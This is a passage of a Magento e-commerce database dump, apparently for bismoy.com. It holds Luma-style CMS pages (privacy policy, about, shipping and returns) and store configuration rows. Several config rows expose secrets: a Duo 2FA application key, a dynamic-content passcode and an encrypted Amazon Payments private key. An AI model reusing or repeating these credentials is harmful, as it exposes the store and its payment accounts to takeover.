access to your computer or any information about you, other than the data you choose to share with us. You can choose to accept or decline cookies. Most web browsers automatically accept cookies, but you can usually modify your browser setting to decline cookies if you prefer. This may prevent you from taking full advantage of the website.</p>\n\n        <p>A \"web beacon\" or \"pixel tag\" or \"clear gif\" is typically a one-pixel image, used to pass information from your computer or mobile device to a website.</p>\n\n        <p>We use cookies and web beacons to keep track of what you have in your shopping cart and to remember you when you return to the website as well as to identify the pages you click on during your visit to our site and the name of the website you visited immediately before clicking to the Luma website. We use this information to improve our site design, product assortments, customer service, and special promotions. You can, of course, disable cookies and web beacons on your computer by indicating this in the preferences or options menus in your browser. However, it is possible that some parts of our website will not operate correctly if you disable cookies. We may also use web beacons, and other technologies, to help track whether our communications are reaching you, to measure their effectiveness, or to collect certain non-personal information about your computer, device, or browser in order to allow us to better design future communications to you.</p>\n\n        <p>We may contract with third parties who may use cookies and web beacons and collect information on our behalf or provide services such as credit card processing, shipping, promotional services, or data management. We call them our Customer Care Partners. These third parties are prohibited by our contract with them from sharing that information with anyone other than us or our other Customer Care Partners.</p>\n\n        <h2 id=\"privacy-policy-title-10\">List of cookies we collect</h2>\n        <p>The table below lists the cookies we collect and the information they store.</p>\n        <table class=\"data-table\">\n            <thead>\n                <tr>\n                    <th>COOKIE name</th>\n                    <th>COOKIE Description</th>\n                </tr>\n            </thead>\n            <tbody>\n                <tr>\n                    <th>CART</th>\n                    <td>The association with your shopping cart.</td>\n                </tr>\n                <tr>\n                    <th>CATEGORY_INFO</th>\n                    <td>Allows pages to be displayed more quickly.</td>\n                </tr>\n                <tr>\n                    <th>COMPARE</th>\n                    <td>The items that you have in the Compare Products list.</td>\n                </tr>\n                <tr>\n                    <th>CUSTOMER</th>\n                    <td>An encrypted version of your customer id.</td>\n                </tr>\n                <tr>\n                    <th>CUSTOMER_AUTH</th>\n                    <td>An indicator if you are signed into the store.</td>\n                </tr>\n                <tr>\n                    <th>CUSTOMER_INFO</th>\n                    <td>An encrypted version of the customer group you belong to.</td>\n                </tr>\n                <tr>\n                    <th>CUSTOMER_SEGMENT_IDS</th>\n                    <td>Stores your Customer Segment ID</td>\n                </tr>\n                <tr>\n                    <th>EXTERNAL_NO_CACHE</th>\n                    <td>A flag that, indicates whether caching is on or off.</td>\n                </tr>\n                <tr>\n                    <th>FRONTEND</th>\n                    <td>Your session ID on the server.</td>\n                </tr>\n                <tr>\n                    <th>GUEST-VIEW</th>\n                    <td>Allows guests to edit their orders.</td>\n                </tr>\n                <tr>\n                    <th>LAST_CATEGORY</th>\n                    <td>The last category you visited.</td>\n                </tr>\n                <tr>\n                    <th>LAST_PRODUCT</th>\n                    <td>The last product you looked at.</td>\n                </tr>\n                <tr>\n                    <th>NEWMESSAGE</th>\n                    <td>Indicates whether a new message has been received.</td>\n                </tr>\n                <tr>\n                    <th>NO_CACHE</th>\n                    <td>Indicates whether it is allowed to use cache.</td>\n                </tr>\n                <tr>\n                    <th>PERSISTENT_SHOPPING_CART</th>\n                    <td>A link to information about your cart and viewing history if you have asked the site.</td>\n                </tr>\n                <tr>\n                    <th>RECENTLYCOMPARED</th>\n                    <td>The items you recently compared.</td>\n                </tr>\n                <tr>\n                    <th>STF</th>\n                    <td>Information on products you emailed to friends.</td>\n                </tr>\n                <tr>\n                    <th>STORE</th>\n                    <td>The store view or language you have selected.</td>\n                </tr>\n                <tr>\n                    <th>USER_ALLOWED_SAVE_COOKIE</th>\n                    <td>Indicates whether a customer authorized cookies.</td>\n                </tr>\n                <tr>\n                    <th>VIEWED_PRODUCT_IDS</th>\n                    <td>The products that you recently looked at.</td>\n                </tr>\n                <tr>\n                    <th>WISHLIST</th>\n                    <td>An encrypted list of products added to your wish list.</td>\n                </tr>\n                <tr>\n                    <th>WISHLIST_CNT</th>\n                    <td>The number of items in your wish list.</td>\n                </tr>\n            </tbody>\n        </table>\n\n        <h2 id=\"privacy-policy-title-11\">Online Account Registration</h2>\n        <p>To make online shopping faster and easier, you may register on the Luma website. As a registered customer, you only have to enter your shipping addresses and billing information once; they will be securely stored with us for your future use. Using your name and a password of your choice, you may access your account online at any time to add, delete, or change information. If you are using a public computer, we strongly encourage you to Sign Out when you finish shopping. Your information will still be stored with us but it will not be accessible to anyone else from that computer.</p>\n\n        <h2 id=\"privacy-policy-title-12\">Emails</h2>\n        <p>You will receive promotional emails from us only if you have asked to receive them. If you do not want to receive email from Luma or its affiliates you can click on the \"Unsubscribe\" link at the bottom of any email communication sent by us. Please allow us 3 business days from when the request was received to complete the removal, as some of our promotions may already have been in process before you submitted your request.</p>\n\n        <h2 id=\"privacy-policy-title-13\">Acceptance</h2>\n        <p>By using this website, you accept the policies set forth in this Privacy Policy.</p>\n\n        <h2 id=\"privacy-policy-title-14\">Questions for Luma?</h2>\n        <p><a href=\"{{store url=\"contact\"}}\">Contact Us</a></p>\n    </div>\n    <div class=\"block block-collapsible-nav\">\n        <div class=\"title block-collapsible-nav-title\" data-mage-init=\"{&quot;toggleAdvanced&quot;: {&quot;toggleContainers&quot;: &quot;#privacy-policy-nav-content&quot;, &quot;selectorsToggleClass&quot;: &quot;active&quot;}}\">Privacy Menu</div>\n        <div class=\"block-collapsible-content content\" id=\"privacy-policy-nav-content\">\n            <ul class=\"items\">\n                <li class=\"item current\"><a href=\"#privacy-policy-title-1\">Luma Security</a></li>\n                <li class=\"item\"><a href=\"#privacy-policy-title-2\">Luma Privacy Policy</a></li>\n                <li class=\"item\"><a href=\"#privacy-policy-title-3\">The Information We Collect</a></li>\n                <li class=\"item\"><a href=\"#privacy-policy-title-4\">How We Use The Information We Collect</a></li>\n                <li class=\"item\"><a href=\"#privacy-policy-title-5\">Security</a></li>\n                <li class=\"item\"><a href=\"#privacy-policy-title-6\">Others With Whom We Share Your Information.</a></li>\n                <li class=\"item\"><a href=\"#privacy-policy-title-7\">Your Choices Regarding Use Of The Information We Collect</a></li>\n                <li class=\"item\"><a href=\"#privacy-policy-title-8\">Your California Privacy Rights</a></li>\n                <li class=\"item\"><a href=\"#privacy-policy-title-9\">Cookies, Web Beacons, and How We Use Them</a></li>\n                <li class=\"item\"><a href=\"#privacy-policy-title-10\">List of cookies we collect</a></li>\n                <li class=\"item\"><a href=\"#privacy-policy-title-11\">Online Account Registration</a></li>\n                <li class=\"item\"><a href=\"#privacy-policy-title-12\">Emails</a></li>\n                <li class=\"item\"><a href=\"#privacy-policy-title-13\">Acceptance</a></li>\n                <li class=\"item\"><a href=\"#privacy-policy-title-14\">Questions for Luma?</a></li>\n            </ul>\n        </div>\n    </div>\n</div>\n', '2020-08-02 13:12:55', '2020-08-08 01:45:08', 1, 0, '', '', '', NULL, NULL, NULL, NULL, NULL),
(5, 'About us', '1column', '', '', 'about-us', 'About us', '<div class=\"about-info cms-content\">\n      <p class=\"cms-content-important\">With more than 230 stores spanning 43 states and growing, Luma is a nationally recognized active wear manufacturer and retailer. We’re passionate about active lifestyles – and it goes way beyond apparel.</p>\n\n      <p>At Luma, wellness is a way of life. We don’t believe age, gender or past actions define you, only your ambition and desire for wholeness... today.</p>\n\n      <p>We differentiate ourselves through a combination of unique designs and styles merged with unequaled standards of quality and authenticity. Our founders have deep roots in yoga and health communities and our selections serve amateur practitioners and professional athletes alike.</p>\n\n      <ul style=\"list-style: none; margin-top: 20px; padding: 0;\">\n          <li><a href=\"{{store url=\"contact\"}}\">Contact Luma</a></li>\n          <li><a href=\"{{store url=\"customer-service\"}}\">Customer Service</a></li>\n          <li><a href=\"{{store url=\"privacy-policy\"}}\">Luma Privacy Policy</a></li>\n          <li><a href=\"{{store url=\"\"}}\">Shop Luma</a></li>\n      </ul>\n  </div>\n', '2020-08-08 01:45:08', '2020-08-08 01:45:08', 1, 0, '', '', '', NULL, NULL, NULL, NULL, NULL),
(6, 'Customer Service', '1column', '', '', 'customer-service', 'Customer Service', '<div class=\"customer-service cms-content\">\n  <div class=\"cms-content-important\">\n      <h2>Luma Delivery and Returns</h2>\n      <p>We hope you love shopping with Luma. Here are our delivery and returns policies to help make sure we meet your expectations. <a href=\"{{store url=\"contact\"}}\">Contact Us.</a></p>\n  </div>\n\n  <h2>Shipping and Delivery</h2>\n  <p>Shipping and Delivery is the charge for internet order processing, item selection, packaging, transport and handling. We don’t guarantee delivery times, but we do our best to provide accurate estimates.</p>\n\n  <p>Deliveries occur only on weekdays. Shipping and Delivery charges are subject to change and are determined when you order. Estimated delivery time assumes orders are placed before 12:00 noon (PST). Orders you place with Luma late on Friday or on Saturday will not be processed until Monday. Charges may be added to orders with Priority, Overnight and International shipping if we try unsuccessfully to deliver your order more than once.</p>\n\n  <p>Delivery addresses in Alaska, Hawaii, Puerto Rico, and Guam should add an additional $5.00 charge for standard Shipping & Delivery. Orders arrive in 7 to 9 business days when ordered before 12:00 noon (PST).</p>\n\n  <div class=\"table-wrapper\">\n      <table>\n          <caption>Shipping and Delivery</caption>\n          <thead>\n              <tr>\n                  <th><strong>Merchandise total *</strong></th>\n                  <th><strong>STANDARD</strong><br />5&mdash;7 day shipping **</th>\n                  <th><strong>PRIORITY</strong><br />2&mdash;3 day shipping **</th>\n                  <th><strong>OVERNIGHT</strong><br />Next business day **</th>\n              </tr>\n          </thead>\n          <tbody>\n              <tr>\n                  <th>Up to $200</th>\n                  <td>$16</td>\n                  <td>$26</td>\n                  <td>$33</td>\n              </tr>\n              <tr>\n                  <th>$200.01&mdash;500.00</th>\n                  <td>$21</td>\n                  <td>$31</td>\n                  <td>$38</td>\n              </tr>\n              <tr>\n                  <th>$500.01&mdash;1000.00</th>\n                  <td>$29</td>\n                  <td>$39</td>\n                  <td>$46</td>\n              </tr>\n              <tr>\n                  <th>Over $1000.00</th>\n                  <td>$34</td>\n                  <td>$44</td>\n                  <td>$51</td>\n              </tr>\n          </tbody>\n      </table>\n  </div>\n\n  <p>\n      <small>*before tax and additional charges</small><br />\n      <small>**after processing if ordered by 12:00 noon PST</small>\n  </p>\n\n  <h2 style=\"margin-top: 40px;\">Returns and Replacements</h2>\n  <p>We want you to be completely happy with your Luma order. If for any reason you are not satisfied, we will gladly accept your timely return of unworn, unwashed, or defective merchandise. Used merchandise cannot be returned unless defective. Returned merchandise should include the vendor packaging and tags and be in the same condition as when it was received. A pickup and/or restock fee may apply. Merchandise must be returned within 30 days of receipt of merchandise.</p>\n\n  <h3>Returning Gifts</h3>\n  <p>When returning a gift, a Luma Gift Card will be issued to the gift recipient for the amount of the returned merchandise. The card can be used for purchases from any Luma store, and online. In compliance with Federal law, for gifts valued at more than $2,000.00, the recipient will receive a check rather than an Luma Gift Card.</p>\n\n  <h3>Returning Merchandise by Mail</h3>\n  <p>On the back of the packing slip enclosed with your Luma order, please note the reason(s) for return and whether you wish to  exchange the item(s) or receive a credit/refund (depending on the original form of  payment).</p>\n  <p>Enclose the return section of the packing slip with your item(s). Please use one  of the return labels provided on the front of your packing slip to ensure proper  return address and credit information. Restricted items must be returned using  ground transportation.</p>\n  <p>Please allow 10 to 14 days for Luma to process your return.</p>\n</div>\n', '2020-08-08 01:45:08', '2020-08-08 01:45:08', 1, 0, '', '', '', NULL, NULL, NULL, NULL, NULL);

-- --------------------------------------------------------

--
-- Table structure for table `cms_page_store`
--

CREATE TABLE `cms_page_store` (
  `page_id` smallint(6) NOT NULL COMMENT 'Entity ID',
  `store_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Store ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='CMS Page To Store Linkage Table';

--
-- Dumping data for table `cms_page_store`
--

INSERT INTO `cms_page_store` (`page_id`, `store_id`) VALUES
(1, 0),
(2, 0),
(3, 0),
(4, 0),
(5, 0),
(6, 0);

-- --------------------------------------------------------

--
-- Table structure for table `core_config_data`
--

CREATE TABLE `core_config_data` (
  `config_id` int(10) UNSIGNED NOT NULL COMMENT 'Config ID',
  `scope` varchar(8) NOT NULL DEFAULT 'default' COMMENT 'Config Scope',
  `scope_id` int(11) NOT NULL DEFAULT 0 COMMENT 'Config Scope ID',
  `path` varchar(255) NOT NULL DEFAULT 'general' COMMENT 'Config Path',
  `value` text DEFAULT NULL COMMENT 'Config Value',
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() COMMENT 'Updated At'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Config Data';

--
-- Dumping data for table `core_config_data`
--

INSERT INTO `core_config_data` (`config_id`, `scope`, `scope_id`, `path`, `value`, `updated_at`) VALUES
(1, 'default', 0, 'yotpo/module_info/yotpo_installation_date', '2020-08-02', '2020-08-02 13:12:31'),
(2, 'default', 0, 'yotpo/sync_settings/orders_sync_start_date', '2020-08-02', '2020-08-02 13:12:31'),
(3, 'default', 0, 'web/seo/use_rewrites', '1', '2020-08-02 13:12:44'),
(4, 'default', 0, 'web/unsecure/base_url', 'http://bismoy.com/', '2020-09-28 05:17:04'),
(5, 'default', 0, 'web/secure/base_url', 'https://bismoy.com/', '2020-09-28 05:17:13'),
(6, 'default', 0, 'general/locale/code', 'en_US', '2020-08-02 13:12:45'),
(7, 'default', 0, 'web/secure/use_in_frontend', NULL, '2020-08-02 13:12:45'),
(8, 'default', 0, 'web/secure/use_in_adminhtml', NULL, '2020-08-02 13:12:45'),
(9, 'default', 0, 'general/locale/timezone', 'Asia/Dhaka', '2020-08-02 13:12:46'),
(10, 'default', 0, 'currency/options/base', 'BDT', '2020-08-02 13:12:46'),
(11, 'default', 0, 'currency/options/default', 'BDT', '2020-08-02 13:12:46'),
(12, 'default', 0, 'currency/options/allow', 'BDT', '2020-08-02 13:12:46'),
(13, 'default', 0, 'general/region/display_all', '1', '2020-08-02 13:12:47'),
(14, 'default', 0, 'general/region/state_required', 'AU,BR,CA,CN,CO,HR,EE,IN,LV,LT,MX,PL,RO,ES,CH,US', '2021-04-13 04:58:05'),
(15, 'default', 0, 'catalog/category/root_id', '2', '2020-08-02 13:13:02'),
(16, 'default', 0, 'analytics/subscription/enabled', '1', '2020-08-02 13:20:29'),
(17, 'default', 0, 'crontab/default/jobs/analytics_subscribe/schedule/cron_expr', '0 * * * *', '2020-08-02 13:20:29'),
(18, 'default', 0, 'crontab/default/jobs/analytics_collect_data/schedule/cron_expr', '00 02 * * *', '2020-08-02 13:20:29'),
(19, 'default', 0, 'payment/authorizenet_acceptjs/cctypes', 'AE,VI,MC,DI,JCB,DN', '2020-08-02 13:20:30'),
(20, 'default', 0, 'payment/authorizenet_acceptjs/order_status', 'processing', '2020-08-02 13:20:30'),
(21, 'default', 0, 'payment/authorizenet_acceptjs/payment_action', 'authorize', '2020-08-02 13:20:30'),
(22, 'default', 0, 'payment/authorizenet_acceptjs/currency', 'USD', '2020-08-02 13:20:30'),
(23, 'websites', 1, 'payment/authorizenet_acceptjs/cctypes', 'AE,VI,MC,DI,JCB,DN', '2020-08-02 13:20:30'),
(24, 'websites', 1, 'payment/authorizenet_acceptjs/order_status', 'processing', '2020-08-02 13:20:30'),
(25, 'websites', 1, 'payment/authorizenet_acceptjs/payment_action', 'authorize', '2020-08-02 13:20:30'),
(26, 'websites', 1, 'payment/authorizenet_acceptjs/currency', 'USD', '2020-08-02 13:20:30'),
(27, 'website', 0, 'connector_configuration/transactional_data/order_statuses', 'canceled,closed,complete,fraud,holded,payment_review,paypal_canceled_reversal,paypal_reversed,pending,pending_payment,pending_paypal,processing', '2020-08-02 13:20:33'),
(28, 'website', 0, 'connector_configuration/catalog_sync/catalog_type', 'simple,virtual,configurable,downloadable,grouped,bundle', '2020-08-02 13:20:34'),
(29, 'website', 0, 'connector_configuration/catalog_sync/catalog_visibility', '1,2,3,4', '2020-08-02 13:20:34'),
(30, 'default', 0, 'connector_dynamic_content/external_dynamic_content_urls/passcode', 'N44O3bRiNjT68NB8ie9FCxcSlzuOkmSp', '2020-08-02 13:20:34'),
(31, 'default', 0, 'connector_automation/review_settings/allow_non_subscribers', '1', '2020-08-02 13:20:34'),
(32, 'default', 0, 'connector_configuration/abandoned_carts/allow_non_subscribers', '1', '2020-08-02 13:20:34'),
(33, 'default', 0, 'sync_settings/addressbook/allow_non_subscribers', '1', '2020-08-02 13:20:34'),
(34, 'default', 0, 'msp_securitysuite_twofactorauth/duo/application_key', 'tdo5Sf1Eb4eN9a5nTsqNhmrSwxAWOchH1jg8DMpz8K1bsAaPCifNy3NWddJArRS6', '2020-08-02 13:20:35'),
(35, 'default', 0, 'admin/usage/enabled', '1', '2020-08-02 13:22:47'),
(36, 'stores', 1, 'design/theme/theme_id', '4', '2020-08-02 13:50:34'),
(37, 'stores', 1, 'design/footer/copyright', NULL, '2020-08-02 13:52:05'),
(38, 'stores', 1, 'design/header/logo_src', 'stores/1/bismoy.png', '2020-08-03 08:05:04'),
(39, 'stores', 1, 'design/header/logo_width', '180', '2020-08-03 08:05:04'),
(40, 'default', 0, 'design/theme/theme_id', '3', '2020-08-08 01:44:25'),
(41, 'default', 0, 'design/head/includes', '<link  rel=\"stylesheet\" type=\"text/css\"  media=\"all\" href=\"{{MEDIA_URL}}styles.css\" />', '2020-08-08 01:44:25'),
(42, 'default', 0, 'carriers/tablerate/active', '1', '2020-08-08 01:44:25'),
(43, 'default', 0, 'carriers/tablerate/condition_name', 'package_value_with_discount', '2020-08-08 01:44:25'),
(44, 'default', 0, 'sales/msrp/enabled', '1', '2020-08-08 01:44:33'),
(45, 'default', 0, 'mpbannerslider/mpbannerslider_design/responsive', '1', '2020-08-21 06:29:12'),
(46, 'default', 0, 'mpbannerslider/mpbannerslider_design/item_slider', '{\"_1598013531795_795\":{\"size\":\"0\",\"items\":\"1\"}}', '2020-08-21 06:29:12'),
(48, 'default', 0, 'mpbannerslider/mpbannerslider_design/nav', '1', '2020-08-21 06:29:12'),
(49, 'default', 0, 'mpbannerslider/mpbannerslider_design/lazyLoad', '1', '2020-08-21 06:29:12'),
(50, 'default', 0, 'payment/amazon_payments/simplepath/publickey', '-----BEGIN PUBLIC KEY-----\r\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEArFss9ot/QQ4TIO/gs45R\r\nrr53prt05nWpqWLkwfdSQpc8IaTlHxqxaWrWPsSklvrQEyUQ1UNJSdPkCIyLZmvW\r\nlomsSPmQiEmVszyLnwDN76dLCi/+bsHcD5AtyhwNFjYFIrwkcEuQjHlx/AgmxwKT\r\npegWPThwlPErd30qF384t9S/9EnOOz0q0tVeSS5I53cI3aW4w5fl533huh0FYMTA\r\nyKbjF5mqlg9q30fXFdheRQEWSwV22SDeWPldldHDIFHcu1d0Pt8jhs/jGQNafJCg\r\nD7MZDjJkqoVKziy7z4ePVQpFQLHTsS+iiWo2Pjv0GaJKIRkOdbo4wuwCxLtVx9eP\r\nhQIDAQAB\r\n-----END PUBLIC KEY-----', '2020-08-27 06:12:28'),
(51, 'default', 0, 'payment/amazon_payments/simplepath/privatekey', '0:3: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', '2020-08-27 06:12:28'),
(52, 'default', 0, 'admin/security/admin_account_sharing', '1', '2020-08-28 05:55:10'),
(53, 'default', 0, 'admin/security/use_case_sensitive_login', '0', '2020-08-28 05:55:10'),
(54, 'default', 0, 'sales_channels/sales_channel_integration/unique_id', '5f489eb44824e', '2020-08-28 06:05:40'),
(55, 'default', 0, 'general/country/default', 'BD', '2021-04-13 04:58:05'),
(56, 'default', 0, 'general/country/destinations', NULL, '2021-04-13 04:58:05'),
(57, 'default', 0, 'general/locale/firstday', '6', '2021-04-13 04:58:05'),
(58, 'default', 0, 'general/store_information/name', NULL, '2021-04-13 04:58:05'),
(59, 'default', 0, 'general/store_information/phone', NULL, '2021-04-13 04:58:05'),
(60, 'default', 0, 'general/store_information/hours', NULL, '2021-04-13 04:58:05'),
(61, 'default', 0, 'general/store_information/country_id', NULL, '2021-04-13 04:58:05'),
(62, 'default', 0, 'general/store_information/region_id', NULL, '2021-04-13 04:58:05'),
(63, 'default', 0, 'general/store_information/postcode', NULL, '2021-04-13 04:58:05'),
(64, 'default', 0, 'general/store_information/city', NULL, '2021-04-13 04:58:05'),
(65, 'default', 0, 'general/store_information/street_line1', NULL, '2021-04-13 04:58:05'),
(66, 'default', 0, 'general/store_information/street_line2', NULL, '2021-04-13 04:58:05'),
(67, 'default', 0, 'general/store_information/merchant_vat_number', NULL, '2021-04-13 04:58:05'),
(68, 'default', 0, 'general/single_store_mode/enabled', '0', '2021-04-13 04:58:05'),
(69, 'default', 0, 'checkout/options/display_billing_address_on', '0', '2021-04-13 05:00:08'),
(70, 'default', 0, 'checkout/options/enable_agreements', '1', '2021-04-13 05:00:08'),
(71, 'default', 0, 'checkout/payment_failed/copy_to', NULL, '2021-04-13 05:00:08'),
(72, 'default', 0, 'checkout/payment_failed/copy_method', 'bcc', '2021-04-13 05:00:08'),
(73, 'default', 0, 'paypal/general/merchant_country', NULL, '2021-04-13 05:00:52'),
(74, 'default', 0, 'payment/paypal_express/active', '0', '2021-04-13 05:00:52'),
(75, 'default', 0, 'payment/paypal_express/in_context', '0', '2021-04-13 05:00:52'),
(76, 'default', 0, 'paypal/general/business_account', NULL, '2021-04-13 05:00:52'),
(77, 'default', 0, 'paypal/wpp/api_authentication', '0', '2021-04-13 05:00:52'),
(78, 'default', 0, 'paypal/wpp/api_username', NULL, '2021-04-13 05:00:52'),
(79, 'default', 0, 'paypal/wpp/api_password', NULL, '2021-04-13 05:00:52'),
(80, 'default', 0, 'paypal/wpp/api_signature', NULL, '2021-04-13 05:00:52'),
(81, 'default', 0, 'paypal/wpp/sandbox_flag', '0', '2021-04-13 05:00:52'),
(82, 'default', 0, 'paypal/wpp/use_proxy', '0', '2021-04-13 05:00:52'),
(83, 'default', 0, 'payment/paypal_express/title', 'PayPal Express Checkout', '2021-04-13 05:00:52'),
(84, 'default', 0, 'payment/paypal_express/sort_order', NULL, '2021-04-13 05:00:52'),
(85, 'default', 0, 'payment/paypal_express/payment_action', 'Authorization', '2021-04-13 05:00:52'),
(86, 'default', 0, 'payment/paypal_express/visible_on_product', '1', '2021-04-13 05:00:52'),
(87, 'default', 0, 'payment/paypal_express/visible_on_cart', '1', '2021-04-13 05:00:52'),
(88, 'default', 0, 'payment/paypal_express/allowspecific', '0', '2021-04-13 05:00:52'),
(89, 'default', 0, 'payment/paypal_express/debug', '0', '2021-04-13 05:00:52'),
(90, 'default', 0, 'payment/paypal_express/verify_peer', '1', '2021-04-13 05:00:52'),
(91, 'default', 0, 'payment/paypal_express/line_items_enabled', '1', '2021-04-13 05:00:52'),
(92, 'default', 0, 'payment/paypal_express/transfer_shipping_options', '0', '2021-04-13 05:00:52'),
(93, 'default', 0, 'paypal/wpp/button_flavor', 'dynamic', '2021-04-13 05:00:52'),
(94, 'default', 0, 'payment/paypal_express/solution_type', 'Mark', '2021-04-13 05:00:52'),
(95, 'default', 0, 'payment/paypal_express/require_billing_address', '0', '2021-04-13 05:00:52'),
(96, 'default', 0, 'payment/paypal_express/allow_ba_signup', 'never', '2021-04-13 05:00:52'),
(97, 'default', 0, 'payment/paypal_express/skip_order_review_step', '1', '2021-04-13 05:00:52'),
(98, 'default', 0, 'payment/paypal_billing_agreement/active', '1', '2021-04-13 05:00:52'),
(99, 'default', 0, 'payment/paypal_billing_agreement/title', 'PayPal Billing Agreement', '2021-04-13 05:00:52'),
(100, 'default', 0, 'payment/paypal_billing_agreement/sort_order', NULL, '2021-04-13 05:00:52'),
(101, 'default', 0, 'payment/paypal_billing_agreement/payment_action', 'Authorization', '2021-04-13 05:00:52'),
(102, 'default', 0, 'payment/paypal_billing_agreement/allowspecific', '0', '2021-04-13 05:00:52'),
(103, 'default', 0, 'payment/paypal_billing_agreement/debug', '0', '2021-04-13 05:00:52'),
(104, 'default', 0, 'payment/paypal_billing_agreement/verify_peer', '1', '2021-04-13 05:00:52'),
(105, 'default', 0, 'payment/paypal_billing_agreement/line_items_enabled', '0', '2021-04-13 05:00:52'),
(106, 'default', 0, 'payment/paypal_billing_agreement/allow_billing_agreement_wizard', '1', '2021-04-13 05:00:52'),
(107, 'default', 0, 'paypal/fetch_reports/ftp_login', NULL, '2021-04-13 05:00:52'),
(108, 'default', 0, 'paypal/fetch_reports/ftp_password', NULL, '2021-04-13 05:00:52'),
(109, 'default', 0, 'paypal/fetch_reports/ftp_sandbox', '0', '2021-04-13 05:00:52'),
(110, 'default', 0, 'paypal/fetch_reports/ftp_ip', NULL, '2021-04-13 05:00:52'),
(111, 'default', 0, 'paypal/fetch_reports/ftp_path', NULL, '2021-04-13 05:00:52'),
(112, 'default', 0, 'paypal/fetch_reports/active', '0', '2021-04-13 05:00:52'),
(113, 'default', 0, 'paypal/fetch_reports/schedule', '1', '2021-04-13 05:00:52'),
(114, 'default', 0, 'paypal/fetch_reports/time', '00,00,00', '2021-04-13 05:00:52'),
(115, 'default', 0, 'paypal/style/logo', NULL, '2021-04-13 05:00:52'),
(116, 'default', 0, 'paypal/style/page_style', NULL, '2021-04-13 05:00:52'),
(117, 'default', 0, 'paypal/style/paypal_hdrimg', NULL, '2021-04-13 05:00:52'),
(118, 'default', 0, 'paypal/style/paypal_hdrbackcolor', NULL, '2021-04-13 05:00:52'),
(119, 'default', 0, 'paypal/style/paypal_hdrbordercolor', NULL, '2021-04-13 05:00:52'),
(120, 'default', 0, 'paypal/style/paypal_payflowcolor', NULL, '2021-04-13 05:00:52'),
(121, 'default', 0, 'paypal/style/checkout_page_button_customize', '0', '2021-04-13 05:00:52'),
